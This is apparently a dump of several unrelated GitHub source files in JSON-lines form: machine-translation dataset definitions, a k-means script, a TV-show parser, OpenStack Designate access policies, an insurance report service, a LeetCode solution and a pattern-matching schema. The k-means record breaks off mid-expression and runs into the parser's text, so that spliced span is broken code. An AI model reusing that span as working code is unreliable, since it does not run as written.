problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"wmt_ende_tokens_32k\")\nclass WMTEnDeTokens32k(WMTEnDeTokens8k):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n\ndef ende_character_generator(tmp_dir, train):\n character_vocab = text_encoder.ByteTextEncoder()\n datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_chr_%s\" % tag)\n return character_generator(data_path + \".lang1\", data_path + \".lang2\",\n character_vocab, EOS)\n\ndef sequence_character_generator(tmp_dir, train):\n character_vocab = text_encoder.ByteTextEncoder()\n #datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n #tag = \"train\" if train else \"dev\"\n #data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_chr_%s\" % tag)\n if not train:\n return character_generator('t2t_split_data/input_test.txt', 't2t_split_data/target_test.txt',\n character_vocab, EOS)\n else:\n return character_generator('t2t_split_data/input_train.txt', 't2t_split_data/target_train.txt',\n character_vocab, EOS) \n\n@registry.register_problem(\"seq_tag_char\")\nclass SeqTagChar(WMTProblem):\n\n @property\n def is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return sequence_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n@registry.register_problem(\"wmt_ende_characters\")\nclass WMTEnDeCharacters(WMTProblem):\n \"\"\"Problem spec for WMT En-De translation.\"\"\"\n\n @property\n def is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return ende_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.GENERIC\n\n\ndef zhen_wordpiece_token_bigenerator(data_dir, tmp_dir, train,\n source_vocab_size, target_vocab_size):\n \"\"\"Wordpiece generator for the WMT'17 zh-en dataset.\"\"\"\n datasets = _ZHEN_TRAIN_DATASETS if train else _ZHEN_TEST_DATASETS\n source_datasets = [[item[0], [item[1][0]]] for item in _ZHEN_TRAIN_DATASETS]\n target_datasets = [[item[0], [item[1][1]]] for item in _ZHEN_TRAIN_DATASETS]\n source_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.zh.%d\" % source_vocab_size,\n source_vocab_size, source_datasets)\n target_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.en.%d\" % target_vocab_size,\n target_vocab_size, target_datasets)\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_zhen_tok_%s\" % tag)\n return bi_vocabs_token_generator(data_path + \".lang1\", data_path + \".lang2\",\n source_vocab, target_vocab, EOS)\n\n\ndef zhen_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n return zhen_wordpiece_token_bigenerator(data_dir, tmp_dir, train,\n vocab_size, vocab_size)\n\n\n@registry.register_problem(\"wmt_zhen_tokens_8k\")\nclass WMTZhEnTokens8k(WMTProblem):\n \"\"\"Problem spec for WMT Zh-En translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return zhen_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.ZH_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.EN_TOK\n\n def feature_encoders(self, data_dir):\n vocab_size = self.targeted_vocab_size\n source_vocab_filename = os.path.join(data_dir,\n \"vocab.zh.%d\" % vocab_size)\n target_vocab_filename = os.path.join(data_dir,\n \"vocab.en.%d\" % vocab_size)\n source_token = text_encoder.SubwordTextEncoder(source_vocab_filename)\n target_token = text_encoder.SubwordTextEncoder(target_vocab_filename)\n return {\n \"inputs\": source_token,\n \"targets\": target_token,\n }\n\n\n@registry.register_problem(\"wmt_zhen_tokens_32k\")\nclass WMTZhEnTokens32k(WMTZhEnTokens8k):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n\ndef enfr_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n \"\"\"Instance of token generator for the WMT en->fr task.\"\"\"\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n datasets = _ENFR_TRAIN_DATASETS if train else _ENFR_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_enfr_tok_%s\" % tag)\n return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_enfr_tokens_8k\")\nclass WMTEnFrTokens8k(WMTProblem):\n \"\"\"Problem spec for WMT En-Fr translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**13 # 8192\n\n @property\n def train_generator(self):\n return enfr_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.FR_TOK\n\n\n@registry.register_problem(\"wmt_enfr_tokens_32k\")\nclass WMTEnFrTokens32k(WMTEnFrTokens8k):\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n\ndef enfr_character_generator(tmp_dir, train):\n \"\"\"Instance of character generator for the WMT en->fr task.\"\"\"\n character_vocab = text_encoder.ByteTextEncoder()\n datasets = _ENFR_TRAIN_DATASETS if train else _ENFR_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_enfr_chr_%s\" % tag)\n return character_generator(data_path + \".lang1\", data_path + \".lang2\",\n character_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_enfr_characters\")\nclass WMTEnFrCharacters(WMTProblem):\n \"\"\"Problem spec for WMT En-Fr translation.\"\"\"\n\n @property\n def is_character_level(self):\n return True\n\n @property\n def train_generator(self):\n return enfr_character_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.EN_CHR\n\n @property\n def target_space_id(self):\n return problem.SpaceID.FR_CHR\n\n\ndef mken_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n \"\"\"Wordpiece generator for the SETimes Mk-En dataset.\"\"\"\n datasets = _MKEN_TRAIN_DATASETS if train else _MKEN_TEST_DATASETS\n source_datasets = [[item[0], [item[1][0]]] for item in _MKEN_TRAIN_DATASETS]\n target_datasets = [[item[0], [item[1][1]]] for item in _MKEN_TRAIN_DATASETS]\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.mken.%d\" % vocab_size, vocab_size,\n source_datasets + target_datasets)\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"setimes_mken_tok_%s\" % tag)\n return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"setimes_mken_tokens_32k\")\nclass SETimesMkEnTokens32k(WMTProblem):\n \"\"\"Problem spec for SETimes Mk-En translation.\"\"\"\n\n @property\n def targeted_vocab_size(self):\n return 2**15 # 32768\n\n @property\n def train_generator(self):\n return mken_wordpiece_token_generator\n\n @property\n def input_space_id(self):\n return problem.SpaceID.MK_TOK\n\n @property\n def target_space_id(self):\n return problem.SpaceID.EN_TOK\n\n\ndef parsing_character_generator(tmp_dir, train):\n character_vocab = text_encoder.ByteTextEncoder()\n filename = \"parsing_%s\" % (\"train\" if train else \"dev\")\n text_filepath = os.path.join(tmp_dir, filename + \".text\")\n tags_filepath = os.path.join(tmp_dir, filename + \".tags\")\n return character_generator(text_filepath, tags_filepath, character_vocab, EOS)\n\n\ndef tabbed_parsing_token_generator(data_dir, tmp_dir, train, prefix,\n source_vocab_size, target_vocab_size):\n \"\"\"Generate source and target data from a single file.\"\"\"\n source_vocab = generator_utils.get_or_generate_tabbed_vocab(\n data_dir, tmp_dir, \"parsing_train.pairs\", 0,\n prefix + \"_source.vocab.%d\" % source_vocab_size, source_vocab_size)\n target_vocab = generator_utils.get_or_generate_tabbed_vocab(\n data_dir, tmp_dir, \"parsing_train.pairs\", 1,\n prefix + \"_target.vocab.%d\" % target_vocab_size, target_vocab_size)\n filename = \"parsing_%s\" % (\"train\" if train else \"dev\")\n pair_filepath = os.path.join(tmp_dir, filename + \".pairs\")\n return tabbed_generator(pair_filepath, source_vocab, target_vocab, EOS)\n\n\ndef tabbed_parsing_character_generator(tmp_dir, train):\n \"\"\"Generate source and target data from a single file.\"\"\"\n character_vocab = text_encoder.ByteTextEncoder()\n filename = \"parsing_%s\" % (\"train\" if train else \"dev\")\n pair_filepath = os.path.join(tmp_dir, filename + \".pairs\")\n return tabbed_generator(pair_filepath, character_vocab, character_vocab, EOS)\n\n\ndef parsing_token_generator(data_dir, tmp_dir, train, vocab_size):\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n filename = \"%s_%s.trees\" % (FLAGS.parsing_path, \"train\" if train else \"dev\")\n tree_filepath = os.path.join(tmp_dir, filename)\n return wsj_parsing.token_generator(tree_filepath, symbolizer_vocab,\n symbolizer_vocab, EOS)\n","repo_name":"jackperkins98/t2t_data","sub_path":"take/wmt.py","file_name":"wmt.py","file_ext":"py","file_size_in_byte":27730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21869604466","text":"import pandas as pd\r\nfrom random import randint, seed\r\nfrom math import sqrt\r\nfrom matplotlib import pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport numpy as np\r\n\r\ndef pick_seeds(data,k):\r\n\r\n centroids = []\r\n observedIndices = set()\r\n for i in range(k):\r\n tempIndex = randint(0, len(data))\r\n while(tempIndex in observedIndices):\r\n tempIndex = randint(0, len(data))\r\n centroids.append(data.iloc[tempIndex])\r\n observedIndices.add(tempIndex)\r\n\r\n return centroids\r\n\r\ndef recalcCentroids(clusters, data, dataHeaders,k):\r\n\r\n newCentroids = []\r\n for i in range(k):\r\n averages = dict(zip(dataHeaders,[0]*len(dataHeaders)))\r\n for item in clusters[i]:\r\n for h in dataHeaders:\r\n averages[h]+=data.loc[item,h]\r\n for h in dataHeaders:\r\n averages[h]=float(averages[h])/(len(clusters[i]))\r\n #if empty cluster, this could create div by 0 error\r\n newCentroids.append(averages)\r\n\r\n return newCentroids\r\n\r\ndef pickClosest(dp, centroids, dataHeaders):\r\n\r\n minDist = None\r\n index = 0\r\n count = 0\r\n for c in centroids:\r\n tempDist = 0\r\n for h in dataHeaders:\r\n tempDist+=(c[h]-dp[h])**2\r\n tempDist = sqrt(tempDist)\r\n if minDist == None or tempDist20->30-> пока не вернет пустой список\"\"\"\n step = 0\n shows_list = []\n request_result = self.load_part_list(step)\n while request_result:\n for result in request_result:\n shows_list.append(result)\n step += self.part_step\n sleep(1)\n request_result = self.load_part_list(step)\n return shows_list\n","repo_name":"AlexeyRadchenko/LostFilmBot","sub_path":"parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73511641433","text":"# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom oslo_log import versionutils\nfrom oslo_policy import policy\n\nfrom designate.common import constants\nfrom designate.common.policies import base\n\n\ndeprecated_all_tenants = policy.DeprecatedRule(\n name=\"all_tenants\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_edit_managed_records = policy.DeprecatedRule(\n name=\"edit_managed_records\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_use_low_ttl = policy.DeprecatedRule(\n name=\"use_low_ttl\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_use_sudo = policy.DeprecatedRule(\n name=\"use_sudo\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\ndeprecated_hard_delete = policy.DeprecatedRule(\n name=\"hard_delete\",\n check_str=base.RULE_ADMIN,\n deprecated_reason=base.DEPRECATED_REASON,\n deprecated_since=versionutils.deprecated.WALLABY\n)\n\nrules = [\n policy.RuleDefault(\n name=\"all_tenants\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Action on all tenants.',\n deprecated_rule=deprecated_all_tenants),\n policy.RuleDefault(\n name=\"edit_managed_records\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Edit managed records.',\n deprecated_rule=deprecated_edit_managed_records),\n policy.RuleDefault(\n name=\"use_low_ttl\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Use low TTL.',\n deprecated_rule=deprecated_use_low_ttl),\n policy.RuleDefault(\n name=\"use_sudo\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description='Accept sudo from user to tenant.',\n deprecated_rule=deprecated_use_sudo),\n policy.RuleDefault(\n name=\"hard_delete\",\n check_str=base.SYSTEM_ADMIN,\n scope_types=[constants.PROJECT],\n description=\"Clean backend resources associated with zone\",\n deprecated_rule=deprecated_hard_delete),\n]\n\n\ndef list_rules():\n return rules\n","repo_name":"openstack/designate","sub_path":"designate/common/policies/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"5"} +{"seq_id":"23063878196","text":"from datetime import datetime, timedelta\nimport datetime as dt\n\nfrom sql import insurance_profit_calculation_sql\n\n\"\"\"\n 短期债券报表Service\n\"\"\"\n\n\nclass InsuranceProfitCalculationService:\n\n def __init__(self):\n self.sql = insurance_profit_calculation_sql\n\n \"\"\"\n 保险收益测算表查询\n \"\"\"\n\n def profit_calculation_report_list(self, query_data):\n\n queryDate = query_data.get(\"settleDate\")\n if(queryDate == None):\n queryDate = dt.date.today().strftime('%Y-%m-%d')\n fundsDataReturn = self.sql.get_funds_list(queryDate, self.__quarter_end(queryDate))\n investDataReturn = self.sql.get_security_invest_list(queryDate, self.__quarter_end(queryDate))\n\n lineRecordMap = {}\n self.__init_lineRecordMap(lineRecordMap)\n\n self.__calculation_by_dbData(fundsDataReturn, lineRecordMap)\n self.__calculation_by_dbData(investDataReturn, lineRecordMap)\n\n hjLineRecord = lineRecordMap[\"hj\"]\n wttzzhjLineRecord = lineRecordMap[\"wttzzh\"]\n for key in lineRecordMap.keys():\n lineRecord = lineRecordMap[key]\n if(key == \"wttzzh\"):\n wttzzhjLineRecord[\"inveCost\"] = lineRecord[\"inveCost\"]\n wttzzhjLineRecord[\"wAvgOccupy\"] = lineRecord[\"wAvgOccupy\"]\n wttzzhjLineRecord[\"profit\"] = lineRecord[\"profit\"]\n if(key != \"hj\" and key != \"wttzzh\" and key != \"yjzzs\" and key != \"hjzy\" and key != \"hjshzy\"):\n hjLineRecord[\"inveCost\"] = hjLineRecord[\"inveCost\"] + lineRecord[\"inveCost\"]\n hjLineRecord[\"wAvgOccupy\"] = hjLineRecord[\"wAvgOccupy\"] + lineRecord[\"wAvgOccupy\"]\n\n lineRecordMap[\"hj\"] = hjLineRecord\n lineRecordMap[\"wttzzh\"] = wttzzhjLineRecord\n lineRecordMap[\"hjzy\"][\"inveCost\"] = hjLineRecord[\"inveCost\"] + wttzzhjLineRecord[\"inveCost\"]\n lineRecordMap[\"hjzy\"][\"wAvgOccupy\"] = hjLineRecord[\"wAvgOccupy\"] + wttzzhjLineRecord[\"wAvgOccupy\"]\n lineRecordMap[\"hjzy\"][\"profit\"] = hjLineRecord[\"profit\"] + wttzzhjLineRecord[\"profit\"]\n lineRecordMap[\"hjshzy\"][\"inveCost\"] = lineRecordMap[\"hjzy\"][\"inveCost\"]\n lineRecordMap[\"hjshzy\"][\"wAvgOccupy\"] = lineRecordMap[\"hjzy\"][\"wAvgOccupy\"]\n lineRecordMap[\"hjshzy\"][\"profit\"] = lineRecordMap[\"hjzy\"][\"profit\"]\n\n for key in lineRecordMap.keys():\n lineRecord = lineRecordMap[key]\n if(lineRecord[\"wAvgOccupy\"] != 0):\n lineRecord[\"yield\"] = lineRecord[\"profit\"]/lineRecord[\"wAvgOccupy\"]*100\n if(lineRecordMap[\"hjzy\"][\"inveCost\"] != 0):\n lineRecord[\"proportion\"] = lineRecord[\"inveCost\"] / lineRecordMap[\"hjzy\"][\"inveCost\"] *100\n lineRecordMap[key] = lineRecord\n print(lineRecord)\n\n returnData = {}\n returnDataList = []\n for key in lineRecordMap.keys():\n returnDataList.append(lineRecordMap[key])\n\n returnData['list'] = returnDataList\n returnData['total'] = returnDataList.__len__()\n return returnData\n\n \"\"\"\n 转换名称\n \"\"\"\n\n\n def __init_lineRecordMap(self, lineRecordMap):\n lineRecordMap['gdsyl'] = {'name': \"1 固定收益类\"}\n # 保证金存款\n lineRecordMap['1.1bzjck'] = {'name': \" 1.1 保证金存款\"}\n bzjck = {'name': \"保证金存款\"}\n lineRecordMap['bzjck'] = bzjck\n # 协议/定期存款\n lineRecordMap['1.2dqck'] = {'name': \" 1.2 协议/定期存款\"}\n dqck = {'name': \"协议/定期存款\"}\n lineRecordMap['dqck'] = dqck\n # 通知存款\n lineRecordMap['1.3tzck'] = {'name': \" 1.3 通知存款\"}\n tzck = {'name': \"通知存款\"}\n lineRecordMap['tzck'] = tzck\n # 保险资管产品\n lineRecordMap['1.4bxzgcp'] = {'name': \" 1.4 保险资管产品\"}\n bxzgcp = {'name': \"保险资管产品\"}\n lineRecordMap['bxzgcp'] = bxzgcp\n # 债券\n lineRecordMap['1.5zq'] = {'name': \" 1.5 债券(委托)\"}\n zq = {'name': \"债券\"}\n lineRecordMap['zq'] = zq\n #2. 现金及流动性管理工具\n lineRecordMap['2.0zq'] = {'name': \"2 现金及流动性管理工具\"}\n # 现金(自有及委托)\n lineRecordMap['2.1xj'] = {'name': \" 2. 1 现金\"}\n xj = {'name': \"现金(自有及委托)\"}\n lineRecordMap['xj'] = xj\n # 货币基金\n lineRecordMap['2.2hbjj'] = {'name': \" 2. 2 货币市场基金\"}\n hbjj = {'name': \"货币基金(自有)\"}\n lineRecordMap['hbjj'] = hbjj\n # 货币市场类资管产品\n lineRecordMap['2.3hbsczgcp'] = {'name': \" 2. 3 货币市���类资管产品\"}\n hbsczgcp = {'name': \"货币市场类资管产品\"}\n lineRecordMap['hbsczgcp'] = hbsczgcp\n # 交易所逆回购\n lineRecordMap['2.4hg'] = {'name': \" 2. 4回购\"}\n jysnhg = {'name': \"交易所逆回购\"}\n lineRecordMap['jysnhg'] = jysnhg\n # 正回购(委托)\n zhg = {'name': \"正回购(委托)\"}\n lineRecordMap['zhg'] = zhg\n #权益类\n lineRecordMap['3.0qyl'] = {'name': \"3 权益类\"}\n # 权益类 基金\n qyljj = {'name': \"基金\"}\n lineRecordMap['qyljj'] = qyljj\n # 权益类 资管产品\n qylzgcp = {'name': \"资管产品\"}\n lineRecordMap['qylzgcp'] = qylzgcp\n # 权益类 股票与基金(委托)\n gpjj = {'name': \"股票与基金(委托)\"}\n lineRecordMap['gpjj'] = gpjj\n # 其它金融产品\n lineRecordMap['4.0qtjrcp'] = {'name': \"4 其它金融产品\"}\n qtjrcp = {'name': \"其它金融产品\"}\n lineRecordMap['qtjrcp'] = qtjrcp\n # 不动产类资产\n lineRecordMap['5.0bdc'] = {'name': \"5 不动产类资产\"}\n bdc = {'name': \"不动产类资产\"}\n lineRecordMap['bdc'] = bdc\n lineRecordMap['hj'] = {'name': \"合计\"}\n lineRecordMap['wttzzh'] = {'name': \"委托投资组合融资\"}\n lineRecordMap['yjzzs'] = {'name': \"预计增值税\"}\n lineRecordMap['hjzy'] = {'name': \"合计(自有)\"}\n lineRecordMap['hjshzy'] = {'name': \"合计(税后自有)\"}\n self.__init_lineRecordColumns(lineRecordMap)\n\n def __init_lineRecordColumns(self, lineRecordMap):\n columns = ['inveCost', 'wAvgOccupy', 'proportion', 'yield', 'profit']\n for key in lineRecordMap.keys():\n for column in columns:\n lineRecordMap.get(key)[column] = 0\n\n def __calculation_by_dbData(self, dbData, lineRecordMap):\n for item in dbData:\n typeStr = ''\n secuCategoryCode = item['secucategorycode']\n bizTypeCode = item[\"biztypecode\"]\n if secuCategoryCode == None:\n secuCategoryCode = ''\n else:\n if(secuCategoryCode == \"BZJCK\"): # 保证金存款\n typeStr = 'bzjck'\n elif (secuCategoryCode == \"DDT\"): # 协议/定期存款\n typeStr = 'dqck'\n elif (secuCategoryCode == \"DDN\"): # 通知存款\n typeStr = 'tzck'\n elif (secuCategoryCode == \"BXZGCP\"): # 保险资管产品\n typeStr = 'bxzgcp'\n elif (secuCategoryCode.startswith(\"DB\")): # 债券(委托)\n typeStr = 'zq'\n elif (secuCategoryCode == \"DDC\"): # 现金\n typeStr = 'xj'\n elif (secuCategoryCode == \"EUM\"): # 货币市场基金\n typeStr = 'hbjj'\n elif (secuCategoryCode == \"BXZGCP\"): # 货币市场类资管产品\n typeStr = 'hbsczgcp'\n elif (secuCategoryCode == \"DP\"): # 回购\n if(bizTypeCode == \"funds_repurchase_nhg\"): # 交易所逆回购\n typeStr = 'jysnhg'\n elif(bizTypeCode == \"funds_repurchase_zhg\"): # 正回购(委托)\n typeStr = 'zhg'\n elif (secuCategoryCode.startswith(\"EU\")):\n if (secuCategoryCode != \"EUM\"): # 权益类 基金\n typeStr = 'qyljj'\n elif (secuCategoryCode == \"ZGCP\"): # 权益类 资管产品\n typeStr = 'qylzgcp'\n elif (secuCategoryCode == \"GPYJJWT\"): # 权益类 股票与基金(委托)\n typeStr = 'gpjj'\n elif (secuCategoryCode == \"EWE\"): # 其它金融产品\n typeStr = 'qtjrcp'\n elif (secuCategoryCode == \"BDC\"): # 不动产\n typeStr = 'bdc'\n if typeStr != '':\n self.__use_data(typeStr, item, lineRecordMap)\n\n def __use_data(self, typeStr, data, lineRecordMap):\n lineRecord = lineRecordMap[typeStr]\n lineRecord['inveCost'] = lineRecord['inveCost'] + data['invecost']\n lineRecord['profit'] = lineRecord['profit'] + data['inverealprofit']\n positionQty = data['positionqty']\n settleDate = data['settledate']\n positionCreateDate = data['positioncreatedate']\n positionClearDate = data['positioncleardate']\n lastYearEed = self.__quarter_end(settleDate)\n if(positionQty>0):\n if(positionCreateDate<=lastYearEed):\n inveCost = data['invecost'] * self._cal_day_between(lastYearEed, settleDate)/365\n else:\n inveCost = data['invecost'] * self._cal_day_between(positionCreateDate, settleDate)/365\n elif(positionQty==0):\n if(positionClearDate>lastYearEed):\n costPositionData = self.sql.get_cost_position_data(data[\"secuglobalcode\"], positionClearDate)\n inveCost = costPositionData['invecost'] * self._cal_day_between(lastYearEed, positionClearDate)/365\n print(data['invecost'])\n lineRecord['wAvgOccupy'] = lineRecord['wAvgOccupy'] + inveCost\n\n\n \"\"\"\n 根据传入的时间获取上年年末日期\n \"\"\"\n\n def __quarter_end(self, currentDate):\n YYYYmmdd = '%Y-%m-%d'\n day = dt.datetime.strptime(currentDate, \"%Y-%m-%d\")\n # 本年第一天\n this_year_start = dt.datetime(day.year, 1, 1)\n # 上年最后一天\n last_year_end_time = this_year_start - timedelta(days=1) + dt.timedelta(hours=23, minutes=59, seconds=59)\n last_year_end = last_year_end_time.strftime(YYYYmmdd)\n # 存放顺序:当前季度末,上个季度末,去年年末\n return last_year_end\n\n \"\"\"\n 计算两日期之间的天数\n \"\"\"\n\n def _cal_day_between(self, startDate, endDate):\n start_date = dt.datetime.strptime(startDate, \"%Y-%m-%d\")\n end_date = dt.datetime.strptime(endDate, \"%Y-%m-%d\")\n return (end_date - start_date).days\n\n\n","repo_name":"hj12hj/ifohoo-flask","sub_path":"service/insurance_profit_calculation_service.py","file_name":"insurance_profit_calculation_service.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15907125128","text":"\"\"\"\n * 你需要从空字符串开始 构造 一个长度为 n 的字符串 s ,构造的过程为每次给当前字符串 前面 添加 一个 字符。\n * 构造过程中得到的所有字符串编号为 1 到 n ,其中长度为 i 的字符串编号为 si 。\n * 比方说,s = \"abaca\" ,s1 == \"a\" ,s2 == \"ca\" ,s3 == \"aca\" 依次类推。\n * si 的 得分 为 si 和 sn 的 最长公共前缀 的长度(注意 s == sn )。\n * 给你最终的字符串 s ,请你返回每一个 si 的 得分之和 。\n * 提示:\n * 1、1 <= s.length <= 10^5\n * 2、s 只包含小写英文字母。\n * 链接:https://leetcode.cn/problems/sum-of-scores-of-built-strings/\n\"\"\"\n\n#\n# @lc app=leetcode.cn id=2223 lang=python3\n#\n# [2223] 构造字符串的总得分和\n#\n\n\n# @lc code=start\nclass Solution:\n\n def sumScores(self, s: str) -> int:\n n = len(s)\n z = [0] * n # 扩展kmp\n ans, l, r = n, 0, 0\n for i in range(1, n):\n # 注:不用 min max,拆开用 < > 比较会更快(仅限于 Python)\n z[i] = max(min(z[i - l], r - i + 1), 0) \n while i + z[i] < n and s[z[i]] == s[i + z[i]]:\n l, r = i, i + z[i]\n z[i] += 1\n ans += z[i]\n return ans\n\n\n# @lc code=end\n\nif __name__ == '__main__':\n # 9\n print(Solution().sumScores(\"babab\"))\n # 14\n print(Solution().sumScores(\"azbazbzaz\"))","repo_name":"adanzl/leetcode-practice","sub_path":"py/q2200/Q2223.py","file_name":"Q2223.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12365678351","text":"import itertools\nimport logging\nimport typing\n\nfrom semantics.graph_layer import elements\nfrom semantics.kb_layer import schema, evidence, orm\nfrom semantics.kb_layer import schema_registry\n\nfrom semantics.kb_layer.orm._word_schema import Word\n\nif typing.TYPE_CHECKING:\n from semantics.kb_layer import schema_attributes\n\n\n_logger = logging.getLogger(__name__)\n\n\nPATTERN_RELATED_LABEL_NAMES = frozenset([\n 'TEMPLATE',\n 'MATCH_REPRESENTATIVE',\n 'CHILD',\n 'SELECTOR',\n 'PREIMAGE',\n 'IMAGE',\n])\n\n\nMatchSchema = typing.TypeVar('MatchSchema', bound=schema.Schema)\nMatchMapping = typing.Dict['Pattern', typing.Tuple['schema.Schema', float]]\n\n\n@schema_registry.register\nclass Pattern(schema.Schema, typing.Generic[MatchSchema]):\n \"\"\"A pattern is a description of the structure of a subgraph of the knowledge graph. Patterns\n correspond to phrases or sentences in natural language. The components of the pattern are\n arranged into a tree or hierarchy which determines the order of search. Matches are built up\n from the leaves to the root of the tree, with each branch representing a sub-clause or\n sub-phrase of the larger pattern.\"\"\"\n\n def __repr__(self) -> str:\n name = ''\n name_obj = self.name.get(validate=False)\n if name_obj and name_obj.spelling:\n name = name_obj.spelling\n return '<%s#%s(%s)>' % (type(self).__name__, int(self._vertex.index), name)\n\n match_representative = schema.attribute('MATCH_REPRESENTATIVE')\n\n # Some, but not all, patterns are named. Typically named patterns are reusable mixins that\n # are only used in a selector role.\n name = schema.attribute('NAME', Word)\n names = schema.attribute('NAME', Word, plural=True)\n\n # Selectors are other patterns which match against the *same* vertex in the graph as this\n # pattern does. Think of a selector as roughly equivalent to a mixin class, but for patterns.\n selectors: 'schema_attributes.PluralAttribute[Pattern[MatchSchema]]'\n\n # Children are other patterns which match against arbitrary other vertices in the graph.\n children: 'schema_attributes.PluralAttribute[Pattern]'\n\n # The template pattern, if defined, is another pattern which was cloned to produce this one,\n # and which should have its evidence updated when this pattern's evidence is updated.\n template: 'schema_attributes.SingularAttribute[Pattern[MatchSchema]]'\n\n @property\n def match(self) -> typing.Optional[MatchSchema]:\n \"\"\"The match representative of the pattern.\n\n NOTE: The evidence mean for the pattern represents its accuracy, whereas the evidence mean\n for the match representative represents the truth value to be matched in the image vertex.\n \"\"\"\n return self.match_representative.get(validate=False)\n\n def templated_clone(self) -> 'Pattern':\n \"\"\"Clone this pattern (and its selectors and children) to produce a new, identical deep\n copy. This pattern's evidence will be updated whenever the clone's is.\n\n The purpose for cloning of patterns is to ensure that during matching, each point of usage\n of a reusable pattern has its own unique and distinguishable identity. For example, consider\n the selector pattern, \"the\", in the phrase \"the eye of the storm\". If the same pattern is\n used for both occurrences of \"the\", then we cannot distinguish their matches and assign a\n different value to each usage.\n \"\"\"\n clone_vertex = self.database.add_vertex(self.vertex.preferred_role)\n clone = Pattern(clone_vertex, self.database)\n clone.template.set(self)\n clone.match_representative.set(self.match_representative.get(validate=False))\n for selector in self.selectors:\n clone.selectors.add(selector.templated_clone())\n for child in self.children:\n clone.children.add(child.templated_clone())\n return clone\n\n def find_matches(self, context: MatchMapping = None, *,\n partial: bool = False) -> typing.Iterator['orm.PatternMatch']:\n \"\"\"Search the graph for matching subgraphs. Return an iterator over the results, *roughly*\n in order of descending match quality. If the partial flag is True, non-isomorphic matches\n (those which do not fully map all patterns to graph structures) can be yielded. Otherwise,\n only isomorphic matches 